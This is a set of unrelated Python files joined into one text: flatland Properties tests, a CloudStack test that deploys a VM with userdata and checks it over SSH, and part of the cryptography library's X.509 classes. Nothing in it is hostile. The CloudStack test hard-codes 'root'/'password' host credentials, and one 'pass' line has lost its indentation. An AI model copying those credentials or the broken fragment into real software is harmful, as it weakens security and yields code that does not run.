                                   retCode,
                                   expectedRetCode))
        config.logger.debug("Net help: {}".format(netHelpMsg))
        resultFlag = False
    if expectedOutput and output != expectedOutput:
        config.logger.error("FAILED cmd {} with output \"{}\", "
                            "expected \"{}\"".
                            format(cmdName,
                                   output[:maxLen],
                                   expectedOutput[:maxLen]))
        #config.logger.debug("Full output: {}".format(output))
        resultFlag = False
    return resultFlag
if __name__ == '__main__':
pass
|
|
from flatland import String
from flatland.schema.properties import Properties
import six
import pytest
def test_empty():
    """An empty Properties is falsy and isolated across class/instance."""
    class Base(object):
        properties = Properties()
    assert not Base.properties
    b = Base()
    assert not b.properties
    assert not Base.properties
    assert Base.properties == {}
    assert Base().properties == {}
    class Sub(Base):
        pass
    assert Sub.properties == {}
    assert Sub().properties == {}
    # Mutating a throwaway instance must not leak to any class.
    Sub().properties['abc'] = 123
    assert Sub.properties == {}
    assert Sub().properties == {}
    assert Base.properties == {}
    assert Base().properties == {}
    # Mutating the subclass must not leak upward to the base class.
    Sub.properties['def'] = 456
    assert Base.properties == {}
    assert Base().properties == {}
def test_dictlike():
    """Properties supports the standard mapping protocol."""
    class Base(object):
        properties = Properties({'def': 456}, abc=123)
    props = Base.properties
    assert sorted(props.items()) == [('abc', 123), ('def', 456)]
    assert sorted(props.keys()) == ['abc', 'def']
    assert sorted(six.iterkeys(props)) == ['abc', 'def']
    assert sorted(props.values()) == [123, 456]
    assert sorted(six.itervalues(props)) == [123, 456]
    assert props.get('abc') == 123
    assert props.get('abc', 'blah') == 123
    assert props.get('blah', 'default') == 'default'
    assert props.get('blah') is None
    # popitem() is deliberately unsupported by Properties.
    with pytest.raises(NotImplementedError):
        props.popitem()
    assert 'abc' in props
    assert 'ghi' not in props
    assert props == {'abc': 123, 'def': 456}
    assert props != {'ghi': 789}
    assert props
    props.clear()
    assert not props
    assert repr(props) == '{}'
def test_instance_population():
    """Writes through an instance stay on that instance only."""
    class Base(object):
        properties = Properties()
    assert not Base.properties
    b = Base()
    b.properties.update(a=1, b=2, c=3)
    assert b.properties == {'a': 1, 'b': 2, 'c': 3}
    # Instance writes never touch the class-level mapping.
    assert Base.properties == {}
    class Sub(Base):
        pass
    assert Sub.properties == {}
    s = Sub()
    assert s.properties == {}
    s.properties['d'] = 4
    assert s.properties == {'d': 4}
    assert Sub.properties == {}
    assert Base.properties == {}
    assert Sub().properties == {}
def test_instance_overlay():
    """Instance properties overlay class properties, read-through style."""
    class Base(object):
        properties = Properties()
    Base.properties['a'] = 1
    b = Base()
    b.properties['b'] = 2
    assert Base.properties == {'a': 1}
    # The instance view merges class keys with its own.
    assert b.properties == {'a': 1, 'b': 2}
    # Deleting through the instance shadows the class key locally only.
    del b.properties['a']
    assert b.properties == {'b': 2}
    assert Base.properties == {'a': 1}
    b.properties.update(b='x', c=3, d=4)
    assert b.properties['b'] == 'x'
    assert b.properties == {'b': 'x', 'c': 3, 'd': 4}
    del b.properties['b']
    assert b.properties == {'c': 3, 'd': 4}
    with pytest.raises(KeyError):
        b.properties['b']
    assert b.properties.setdefault('e', 5) == 5
    assert b.properties.setdefault('e', 'blah') == 5
    assert b.properties == {'c': 3, 'd': 4, 'e': 5}
    assert b.properties.pop('e', 'blah') == 5
    assert b.properties.pop('e', 'blah') == 'blah'
    with pytest.raises(KeyError):
        b.properties.pop('e')
    b.properties.clear()
    # After clear(), the class-level values shine through again.
    assert b.properties == {}
    assert Base.properties == {'a': 1}
    Base.properties['b'] = 2
    assert b.properties == {'b': 2}
    assert Base.properties == {'a': 1, 'b': 2}
    Base.properties.update(c=3, d=4, e=5)
    del Base.properties['e']
    assert b.properties == {'b': 2, 'c': 3, 'd': 4}
    assert Base.properties == {'a': 1, 'b': 2, 'c': 3, 'd': 4}
def test_instance_member_assignment():
    """Assigning a plain dict to the attribute detaches it from the class."""
    class Base(object):
        properties = Properties(abc=123)
    b = Base()
    assert b.properties == {'abc': 123}
    b.properties = {'abc': 'detached'}
    assert b.properties == {'abc': 'detached'}
    # Later class-level changes no longer reach the detached instance.
    Base.properties['def'] = 456
    assert b.properties == {'abc': 'detached'}
def test_subclass_overlay():
    """Subclasses overlay ancestor Properties, with local shadowing."""
    class Base(object):
        properties = Properties()
    class Middle(Base):
        pass
    class Lowest(Middle):
        pass
    Lowest.properties['def'] = 456
    assert Base.properties == {}
    assert Middle.properties == {}
    assert Lowest.properties == {'def': 456}
    # Base keys become visible down the whole hierarchy.
    Base.properties['abc'] = 123
    assert Base.properties == {'abc': 123}
    assert Middle.properties == {'abc': 123}
    assert Lowest.properties == {'abc': 123, 'def': 456}
    # Deletion in the middle shadows the key for Middle and below,
    # without touching Base.
    del Middle.properties['abc']
    assert Base.properties == {'abc': 123}
    assert 'abc' in Base.properties
    assert Middle.properties == {}
    assert 'abc' not in Middle.properties
    with pytest.raises(KeyError):
        Middle.properties['abc']
    assert Lowest.properties == {'def': 456}
    assert 'abc' not in Lowest.properties
    with pytest.raises(KeyError):
        Lowest.properties['abc']
    Middle.properties.setdefault('ghi', 789)
    Middle.properties.setdefault('ghi', 'blah')
    assert Base.properties == {'abc': 123}
    assert Middle.properties == {'ghi': 789}
    assert Lowest.properties == {'ghi': 789, 'def': 456}
    assert Lowest.properties.pop('def', 'blah') == 456
    assert Lowest.properties.pop('def', 'blah') == 'blah'
    with pytest.raises(KeyError):
        Lowest.properties.pop('def')
    assert Base.properties == {'abc': 123}
    assert Middle.properties == {'ghi': 789}
    assert Lowest.properties == {'ghi': 789}
    # clear() on the lowest class wipes the merged view for it alone.
    Lowest.properties.clear()
    assert Base.properties == {'abc': 123}
    assert Middle.properties == {'ghi': 789}
    assert Lowest.properties == {}
def test_subclass_override():
    """A fresh Properties on a subclass breaks the inheritance chain."""
    class Base(object):
        properties = Properties()
    class Middle(Base):
        pass
    class Override(Middle):
        properties = Properties({'def': 456})
    assert Override.properties == {'def': 456}
    assert Middle.properties == {}
    assert Base.properties == {}
    # Base keys reach Middle but not the overriding class.
    Base.properties['abc'] = 123
    assert Base.properties == {'abc': 123}
    assert Middle.properties == {'abc': 123}
    assert Override.properties == {'def': 456}
def test_initialization():
    """Constructor kwargs seed the mapping; normal edits work afterwards."""
    class Holder(object):
        properties = Properties(abc=123)
    assert Holder.properties == {'abc': 123}
    Holder.properties['def'] = 456
    assert Holder.properties == {'abc': 123, 'def': 456}
    del Holder.properties['abc']
    assert Holder.properties == {'def': 456}
def test_perverse():
    """Exercise the descriptor directly in unusual/detached situations."""
    class Base(object):
        properties = Properties()
    # Grab the raw descriptor before removing the attribute.
    descriptor = Base.__dict__['properties']
    props = Base.properties
    del Base.properties
    # With the descriptor detached, the view has no backing frames left.
    assert list(props._frames()) == []
    def unattached_properties():
        class Unrelated(object):
            pass
        return descriptor.__get__(None, Unrelated)
    lost = unattached_properties()
    assert lost == {}
    lost2 = unattached_properties()
    with pytest.raises(KeyError):
        lost2['abc']
    class Broken(object):
        properties = 'something else'
    # The descriptor's view works even when the class attribute is
    # something entirely unrelated; the class attribute is untouched.
    broken = descriptor.__get__(None, Broken)
    broken.update(abc=123)
    assert broken == {'abc': 123}
    assert Broken.properties == 'something else'
# python3 immediately raises an exception if there is such a name clash
# (a __slots__ entry conflicting with a class attribute), so this test
# can only run on python 2.
if not six.PY3:
    def test_perverse_slots():
        """A Properties clashing with __slots__ is unreadable per-instance."""
        class Base(object):
            __slots__ = 'properties',
            properties = Properties()
        b = Base()
        with pytest.raises(AttributeError):
            b.properties['abc']
def test_dsl():
    """with_properties()/using() create detached Properties copies."""
    Sub = String.with_properties(abc=123)
    assert 'abc' not in String.properties
    assert Sub.properties['abc'] == 123
    # using(properties=dict) yields a mapping detached from the parent.
    Disconnected = Sub.using(properties={'def': 456})
    assert Disconnected.properties['def'] == 456
    assert 'abc' not in Disconnected.properties
    assert 'def' not in Sub.properties
    assert 'def' not in String.properties
    # Later parent edits do not flow into the detached copy.
    Sub.properties['ghi'] = 789
    assert Disconnected.properties == {'def': 456}
    Disconnected2 = Sub.using(properties=Properties(jkl=123))
    assert Disconnected2.properties == {'jkl': 123}
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# this script will cover VMdeployment with Userdata tests
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.integration.lib.base import *
from marvin.integration.lib.utils import *
from marvin.integration.lib.common import *
from nose.plugins.attrib import attr
from marvin.sshClient import SshClient
import unittest
import random
import string
_multiprocess_shared_ = True
import os
class Services:
    """Static fixture data consumed by the userdata deployment tests."""
    def __init__(self):
        # Keys mirror the CloudStack API entities created in setUpClass.
        self.services = {
            "account": {
                "email": "test@test.com",
                "firstname": "Test",
                "lastname": "User",
                "username": "test",
                "password": "password",
            },
            "virtual_machine": {
                "displayname": "TesVM1",
                "username": "root",
                "password": "password",
                "ssh_port": 22,
                "hypervisor": 'XenServer',
                "privateport": 22,
                "publicport": 22,
                "protocol": 'TCP',
            },
            "ostype": 'CentOS 5.3 (64-bit)',
            # Small offering so the test VM deploys quickly.
            "service_offering": {
                "name": "Tiny Instance",
                "displaytext": "Tiny Instance",
                "cpunumber": 1,
                "cpuspeed": 100,
                "memory": 256,
            },
        }
class TestDeployVmWithUserData(cloudstackTestCase):
    """Tests for UserData

    Deploys a VM with >2KB of userdata via HTTP POST and checks the
    virtual router actually serves that userdata back.
    """
    @classmethod
    def setUpClass(cls):
        cls.apiClient = super(TestDeployVmWithUserData, cls).getClsTestClient().getApiClient()
        cls.services = Services().services
        cls.zone = get_zone(cls.apiClient, cls.services)
        if cls.zone.localstorageenabled:
            #For devcloud since localstroage is enabled
            cls.services["service_offering"]["storagetype"] = "local"
        cls.service_offering = ServiceOffering.create(
            cls.apiClient,
            cls.services["service_offering"]
        )
        cls.account = Account.create(cls.apiClient, services=cls.services["account"])
        # Account is the only resource tracked for cleanup; deleting it
        # cascades to the VMs created under it.
        cls.cleanup = [cls.account]
        cls.template = get_template(
            cls.apiClient,
            cls.zone.id,
            cls.services["ostype"]
        )
        # Generate userdata of 2500 bytes. This is larger than the 2048 bytes limit.
        # CS however allows for upto 4K bytes in the code. So this must succeed.
        # Overall, the query length must not exceed 4K, for then the json decoder
        # will fail this operation at the marvin client side itself.
        cls.userdata = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(2500))
        cls.user_data_2k= ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(2000))
        cls.user_data_2kl = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(1900))
    @attr(tags=["simulator", "devcloud", "basic", "advanced"])
    def test_deployvm_userdata_post(self):
        """Test userdata as POST, size > 2k
        """
        # NOTE(review): base64 is not imported by name in this module;
        # presumably one of the wildcard marvin imports provides it — confirm.
        self.userdata=base64.b64encode(self.userdata)
        self.services["virtual_machine"]["userdata"] = self.userdata
        deployVmResponse = VirtualMachine.create(
            self.apiClient,
            services=self.services["virtual_machine"],
            accountid=self.account.name,
            domainid=self.account.domainid,
            serviceofferingid=self.service_offering.id,
            templateid=self.template.id,
            zoneid=self.zone.id,
            method="POST"
        )
        vms = list_virtual_machines(
            self.apiClient,
            account=self.account.name,
            domainid=self.account.domainid,
            id=deployVmResponse.id
        )
        self.assert_(len(vms) > 0, "There are no Vms deployed in the account %s" % self.account.name)
        vm = vms[0]
        self.assert_(vm.id == str(deployVmResponse.id), "Vm deployed is different from the test")
        self.assert_(vm.state == "Running", "VM is not in Running state")
        ip_addr=deployVmResponse.ipaddress
        # Locate the virtual router that serves this VM's network, since
        # the router is what stores and serves the userdata.
        if self.zone.networktype == "Basic":
            list_router_response = list_routers(
                self.apiClient,
                listall="true"
            )
        else:
            list_router_response = list_routers(
                self.apiClient,
                account=self.account.name,
                domainid=self.account.domainid
            )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiClient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        # NOTE(review): host credentials are hard-coded here; presumably
        # fine for devcloud/simulator runs — confirm for real deployments.
        host.user="root"
        host.passwd="password"
        # The router serves userdata from this well-known path, keyed by
        # the VM's IP address.
        cmd="cat /var/www/html/userdata/"+deployVmResponse.ipaddress+"/user-data"
        if self.apiClient.hypervisor.lower() == 'vmware':
            # VMware routers are reached via the management server.
            try:
                result = get_process_status(
                    self.apiClient.connection.mgtSvr,
                    22,
                    self.apiClient.connection.user,
                    self.apiClient.connection.passwd,
                    router.linklocalip,
                    cmd,
                    hypervisor=self.apiClient.hypervisor
                )
                res = str(result)
                self.assertEqual(res.__contains__(self.userdata),True,"Userdata Not applied Check the failures")
            except KeyError:
                self.skipTest("Marvin configuration has no host credentials to check USERDATA")
        else:
            # Other hypervisors: hop through the host to the router's
            # link-local address.
            try:
                result = get_process_status(
                    host.ipaddress,
                    22,
                    host.user,
                    host.passwd,
                    router.linklocalip,
                    cmd
                )
                res = str(result)
                self.assertEqual(res.__contains__(self.userdata),True,"Userdata Not applied Check the failures")
            except KeyError:
                self.skipTest("Marvin configuration has no host credentials to check router user data")
    @classmethod
    def tearDownClass(cls):
        try:
            #Cleanup resources used
            cleanup_resources(cls.apiClient, cls.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
# ---------------------------------------------------------------------------
# NOTE(review): two stray "|" lines stood here — file-concatenation artifacts
# that are invalid Python syntax. Replaced with this comment separator.
# Everything below originates from a second module (X.509 support code).
# ---------------------------------------------------------------------------
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import abc
import ipaddress
from enum import Enum
import six
from cryptography import utils
from cryptography.hazmat.primitives import hashes
# Maps dotted OID strings to human-readable names. Used by
# ObjectIdentifier.__repr__ for friendly output; covers name attributes,
# signature algorithms, extended key usages and extension OIDs.
_OID_NAMES = {
    "2.5.4.3": "commonName",
    "2.5.4.6": "countryName",
    "2.5.4.7": "localityName",
    "2.5.4.8": "stateOrProvinceName",
    "2.5.4.10": "organizationName",
    "2.5.4.11": "organizationalUnitName",
    "2.5.4.5": "serialNumber",
    "2.5.4.4": "surname",
    "2.5.4.42": "givenName",
    "2.5.4.12": "title",
    "2.5.4.44": "generationQualifier",
    "2.5.4.46": "dnQualifier",
    "2.5.4.65": "pseudonym",
    "0.9.2342.19200300.100.1.25": "domainComponent",
    "1.2.840.113549.1.9.1": "emailAddress",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.14": "sha224WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.3.1": "ecdsa-with-SHA224",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
    "1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
    "1.2.840.10045.4.3.4": "ecdsa-with-SHA512",
    "1.2.840.10040.4.3": "dsa-with-sha1",
    "2.16.840.1.101.3.4.3.1": "dsa-with-sha224",
    "2.16.840.1.101.3.4.3.2": "dsa-with-sha256",
    "1.3.6.1.5.5.7.3.1": "serverAuth",
    "1.3.6.1.5.5.7.3.2": "clientAuth",
    "1.3.6.1.5.5.7.3.3": "codeSigning",
    "1.3.6.1.5.5.7.3.4": "emailProtection",
    "1.3.6.1.5.5.7.3.8": "timeStamping",
    "1.3.6.1.5.5.7.3.9": "OCSPSigning",
    "2.5.29.9": "subjectDirectoryAttributes",
    "2.5.29.14": "subjectKeyIdentifier",
    "2.5.29.15": "keyUsage",
    "2.5.29.17": "subjectAltName",
    "2.5.29.18": "issuerAltName",
    "2.5.29.19": "basicConstraints",
    "2.5.29.21": "cRLReason",
    "2.5.29.24": "invalidityDate",
    "2.5.29.29": "certificateIssuer",
    "2.5.29.30": "nameConstraints",
    "2.5.29.31": "cRLDistributionPoints",
    "2.5.29.32": "certificatePolicies",
    "2.5.29.33": "policyMappings",
    "2.5.29.35": "authorityKeyIdentifier",
    "2.5.29.36": "policyConstraints",
    "2.5.29.37": "extendedKeyUsage",
    "2.5.29.46": "freshestCRL",
    "2.5.29.54": "inhibitAnyPolicy",
    "1.3.6.1.5.5.7.1.1": "authorityInfoAccess",
    "1.3.6.1.5.5.7.1.11": "subjectInfoAccess",
    "1.3.6.1.5.5.7.48.1.5": "OCSPNoCheck",
    "1.3.6.1.5.5.7.48.1": "OCSP",
    "1.3.6.1.5.5.7.48.2": "caIssuers",
    "1.3.6.1.5.5.7.2.1": "id-qt-cps",
    "1.3.6.1.5.5.7.2.2": "id-qt-unotice",
}
# Maps ASN.1 GeneralName CHOICE tag numbers to the variant names
# (the numbering follows the GeneralName definition in RFC 5280).
_GENERAL_NAMES = {
    0: "otherName",
    1: "rfc822Name",
    2: "dNSName",
    3: "x400Address",
    4: "directoryName",
    5: "ediPartyName",
    6: "uniformResourceIdentifier",
    7: "iPAddress",
    8: "registeredID",
}
class Version(Enum):
    """Supported X.509 certificate versions.

    Member values are the raw integers used in the certificate encoding
    (v1 -> 0, v3 -> 2).
    """
    v1 = 0
    v3 = 2
def load_pem_x509_certificate(data, backend):
    """Deserialize a PEM-encoded X.509 certificate using *backend*.

    :param data: PEM bytes for a single certificate.
    :param backend: object providing ``load_pem_x509_certificate``.
    :return: the certificate object produced by the backend.
    """
    certificate = backend.load_pem_x509_certificate(data)
    return certificate
def load_der_x509_certificate(data, backend):
    """Deserialize a DER-encoded X.509 certificate using *backend*.

    :param data: DER bytes for a single certificate.
    :param backend: object providing ``load_der_x509_certificate``.
    :return: the certificate object produced by the backend.
    """
    certificate = backend.load_der_x509_certificate(data)
    return certificate
def load_pem_x509_csr(data, backend):
    """Deserialize a PEM-encoded certificate signing request using *backend*.

    :param data: PEM bytes for a single CSR.
    :param backend: object providing ``load_pem_x509_csr``.
    :return: the CSR object produced by the backend.
    """
    request = backend.load_pem_x509_csr(data)
    return request
def load_der_x509_csr(data, backend):
    """Deserialize a DER-encoded certificate signing request using *backend*.

    :param data: DER bytes for a single CSR.
    :param backend: object providing ``load_der_x509_csr``.
    :return: the CSR object produced by the backend.
    """
    request = backend.load_der_x509_csr(data)
    return request
class InvalidVersion(Exception):
    """Raised when a certificate reports an unsupported X.509 version."""

    def __init__(self, msg, parsed_version):
        # Keep the raw parsed value around so callers can inspect it.
        self.parsed_version = parsed_version
        super(InvalidVersion, self).__init__(msg)
class DuplicateExtension(Exception):
    """Raised when the same extension OID appears more than once."""

    def __init__(self, msg, oid):
        # Record which OID was duplicated for programmatic handling.
        self.oid = oid
        super(DuplicateExtension, self).__init__(msg)
class UnsupportedExtension(Exception):
    """Raised when an extension OID is not understood by this module."""

    def __init__(self, msg, oid):
        # Record the unrecognized OID for programmatic handling.
        self.oid = oid
        super(UnsupportedExtension, self).__init__(msg)
class ExtensionNotFound(Exception):
    """Raised when a requested extension OID is absent."""

    def __init__(self, msg, oid):
        # Record the missing OID for programmatic handling.
        self.oid = oid
        super(ExtensionNotFound, self).__init__(msg)
class UnsupportedGeneralNameType(Exception):
    """Raised when a GeneralName CHOICE tag has no supported wrapper."""

    def __init__(self, msg, type):
        # ``type`` is the numeric GeneralName tag that was encountered.
        self.type = type
        super(UnsupportedGeneralNameType, self).__init__(msg)
class NameAttribute(object):
    """A single OID/value pair inside an X.509 distinguished name.

    :param oid: an :class:`ObjectIdentifier` naming the attribute type.
    :param value: the attribute value as a text string.
    :raises TypeError: if either argument has the wrong type.
    """

    def __init__(self, oid, value):
        if not isinstance(oid, ObjectIdentifier):
            raise TypeError(
                "oid argument must be an ObjectIdentifier instance."
            )
        if not isinstance(value, six.text_type):
            raise TypeError(
                "value argument must be a text type."
            )
        self._oid = oid
        self._value = value

    oid = utils.read_only_property("_oid")
    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, NameAttribute):
            return NotImplemented
        return (
            self.oid == other.oid and
            self.value == other.value
        )

    def __ne__(self, other):
        return not self == other

    def __hash__(self):
        # Defining __eq__ without __hash__ would make instances unhashable
        # on Python 3 (and hash-by-identity on Python 2), so hash on the
        # same fields __eq__ compares — consistent with ObjectIdentifier.
        return hash((self.oid, self.value))

    def __repr__(self):
        return "<NameAttribute(oid={0.oid}, value={0.value!r})>".format(self)
class ObjectIdentifier(object):
    """An ASN.1 object identifier held as its dotted string form.

    Equality and hashing are both based solely on the dotted string, so
    instances are safe to use as dict keys / set members.
    """
    def __init__(self, dotted_string):
        # e.g. "2.5.29.19"; this string is the full identity of the OID.
        self._dotted_string = dotted_string
    def __eq__(self, other):
        if not isinstance(other, ObjectIdentifier):
            return NotImplemented
        return self._dotted_string == other._dotted_string
    def __ne__(self, other):
        return not self == other
    def __repr__(self):
        # Include the friendly name when known (see _OID_NAMES above).
        return "<ObjectIdentifier(oid={0}, name={1})>".format(
            self._dotted_string,
            _OID_NAMES.get(self._dotted_string, "Unknown OID")
        )
    def __hash__(self):
        # Consistent with __eq__: both use only the dotted string.
        return hash(self.dotted_string)
    # Read-only accessor; assumes utils.read_only_property exposes the
    # underlying attribute as a non-settable property.
    dotted_string = utils.read_only_property("_dotted_string")
class Name(object):
    """An ordered sequence of NameAttribute objects (an X.509 Name)."""

    def __init__(self, attributes):
        self._attributes = attributes

    def get_attributes_for_oid(self, oid):
        """Return every attribute whose ``oid`` equals *oid*, in order."""
        return [attr for attr in self._attributes if attr.oid == oid]

    def __iter__(self):
        return iter(self._attributes)

    def __len__(self):
        return len(self._attributes)

    def __eq__(self, other):
        if not isinstance(other, Name):
            return NotImplemented
        return self._attributes == other._attributes

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<Name({0!r})>".format(self._attributes)
# Certificate/CRL extension OIDs (the 2.5.29.* arc plus PKIX 1.3.6.1.5.5.7.*);
# see _OID_NAMES above for the matching human-readable names.
OID_SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9")
OID_SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14")
OID_KEY_USAGE = ObjectIdentifier("2.5.29.15")
OID_SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17")
OID_ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18")
OID_BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19")
OID_CRL_REASON = ObjectIdentifier("2.5.29.21")
OID_INVALIDITY_DATE = ObjectIdentifier("2.5.29.24")
OID_CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29")
OID_NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30")
OID_CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31")
OID_CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32")
OID_POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33")
OID_AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35")
OID_POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36")
OID_EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37")
OID_FRESHEST_CRL = ObjectIdentifier("2.5.29.46")
OID_INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54")
OID_AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1")
OID_SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11")
OID_OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5")
class Extensions(object):
    """A read-only collection of Extension objects with OID lookup."""

    def __init__(self, extensions):
        self._extensions = extensions

    def get_extension_for_oid(self, oid):
        """Return the first extension whose OID equals *oid*.

        :raises ExtensionNotFound: if no such extension exists.
        """
        for extension in self._extensions:
            if extension.oid == oid:
                return extension
        raise ExtensionNotFound("No {0} extension was found".format(oid), oid)

    def __iter__(self):
        return iter(self._extensions)

    def __len__(self):
        return len(self._extensions)
class Extension(object):
    """A single X.509 extension: an OID, a criticality flag and a value."""

    def __init__(self, oid, critical, value):
        if not isinstance(oid, ObjectIdentifier):
            raise TypeError(
                "oid argument must be an ObjectIdentifier instance."
            )
        if not isinstance(critical, bool):
            raise TypeError("critical must be a boolean value")
        self._oid = oid
        self._critical = critical
        self._value = value

    oid = utils.read_only_property("_oid")
    critical = utils.read_only_property("_critical")
    value = utils.read_only_property("_value")

    def __eq__(self, other):
        if not isinstance(other, Extension):
            return NotImplemented
        return (
            self.oid == other.oid and
            self.critical == other.critical and
            self.value == other.value
        )

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return ("<Extension(oid={0.oid}, critical={0.critical}, "
                "value={0.value})>").format(self)
class ExtendedKeyUsage(object):
    """extendedKeyUsage extension value: a list of usage OIDs."""

    def __init__(self, usages):
        if not all(isinstance(u, ObjectIdentifier) for u in usages):
            raise TypeError(
                "Every item in the usages list must be an ObjectIdentifier"
            )
        self._usages = usages

    def __iter__(self):
        return iter(self._usages)

    def __len__(self):
        return len(self._usages)

    def __eq__(self, other):
        if not isinstance(other, ExtendedKeyUsage):
            return NotImplemented
        return self._usages == other._usages

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return "<ExtendedKeyUsage({0})>".format(self._usages)
class OCSPNoCheck(object):
    """Marker value for the OCSPNoCheck extension (OID 1.3.6.1.5.5.7.48.1.5,
    see OID_OCSP_NO_CHECK below); the extension carries no payload, so this
    class has no state.
    """
    pass
class BasicConstraints(object):
    """basicConstraints extension value: CA flag plus optional path length.

    ``path_length`` may only be set when ``ca`` is True, and must then be
    a non-negative integer.
    """

    def __init__(self, ca, path_length):
        if not isinstance(ca, bool):
            raise TypeError("ca must be a boolean value")
        if path_length is not None and not ca:
            raise ValueError("path_length must be None when ca is False")
        if path_length is not None and (
            not isinstance(path_length, six.integer_types) or path_length < 0
        ):
            raise TypeError(
                "path_length must be a non-negative integer or None"
            )
        self._ca = ca
        self._path_length = path_length

    ca = utils.read_only_property("_ca")
    path_length = utils.read_only_property("_path_length")

    def __eq__(self, other):
        if not isinstance(other, BasicConstraints):
            return NotImplemented
        return self.ca == other.ca and self.path_length == other.path_length

    def __ne__(self, other):
        return not self == other

    def __repr__(self):
        return ("<BasicConstraints(ca={0.ca}, "
                "path_length={0.path_length})>").format(self)
class KeyUsage(object):
    """keyUsage extension value: nine boolean key-usage flags.

    ``encipher_only`` and ``decipher_only`` are only meaningful while
    ``key_agreement`` is true; reading them otherwise raises ValueError.
    """

    def __init__(self, digital_signature, content_commitment, key_encipherment,
                 data_encipherment, key_agreement, key_cert_sign, crl_sign,
                 encipher_only, decipher_only):
        if not key_agreement and (encipher_only or decipher_only):
            raise ValueError(
                "encipher_only and decipher_only can only be true when "
                "key_agreement is true"
            )
        self._digital_signature = digital_signature
        self._content_commitment = content_commitment
        self._key_encipherment = key_encipherment
        self._data_encipherment = data_encipherment
        self._key_agreement = key_agreement
        self._key_cert_sign = key_cert_sign
        self._crl_sign = crl_sign
        self._encipher_only = encipher_only
        self._decipher_only = decipher_only

    digital_signature = utils.read_only_property("_digital_signature")
    content_commitment = utils.read_only_property("_content_commitment")
    key_encipherment = utils.read_only_property("_key_encipherment")
    data_encipherment = utils.read_only_property("_data_encipherment")
    key_agreement = utils.read_only_property("_key_agreement")
    key_cert_sign = utils.read_only_property("_key_cert_sign")
    crl_sign = utils.read_only_property("_crl_sign")

    @property
    def encipher_only(self):
        # Guard clause: defined only while key_agreement is set.
        if self.key_agreement:
            return self._encipher_only
        raise ValueError(
            "encipher_only is undefined unless key_agreement is true"
        )

    @property
    def decipher_only(self):
        # Guard clause: defined only while key_agreement is set.
        if self.key_agreement:
            return self._decipher_only
        raise ValueError(
            "decipher_only is undefined unless key_agreement is true"
        )

    def __repr__(self):
        # The two conditional flags may be unreadable; show None then.
        try:
            encipher_only = self.encipher_only
            decipher_only = self.decipher_only
        except ValueError:
            encipher_only = None
            decipher_only = None
        return ("<KeyUsage(digital_signature={0.digital_signature}, "
                "content_commitment={0.content_commitment}, "
                "key_encipherment={0.key_encipherment}, "
                "data_encipherment={0.data_encipherment}, "
                "key_agreement={0.key_agreement}, "
                "key_cert_sign={0.key_cert_sign}, crl_sign={0.crl_sign}, "
                "encipher_only={1}, decipher_only={2})>").format(
                    self, encipher_only, decipher_only)

    def __eq__(self, other):
        if not isinstance(other, KeyUsage):
            return NotImplemented
        return (
            self.digital_signature == other.digital_signature and
            self.content_commitment == other.content_commitment and
            self.key_encipherment == other.key_encipherment and
            self.data_encipherment == other.data_encipherment and
            self.key_agreement == other.key_agreement and
            self.key_cert_sign == other.key_cert_sign and
            self.crl_sign == other.crl_sign and
            self._encipher_only == other._encipher_only and
            self._decipher_only == other._decipher_only
        )

    def __ne__(self, other):
        return not self == other
class AuthorityInformationAccess(object):
    """authorityInfoAccess extension value: a list of AccessDescription."""

    def __init__(self, descriptions):
        if not all(isinstance(d, AccessDescription) for d in descriptions):
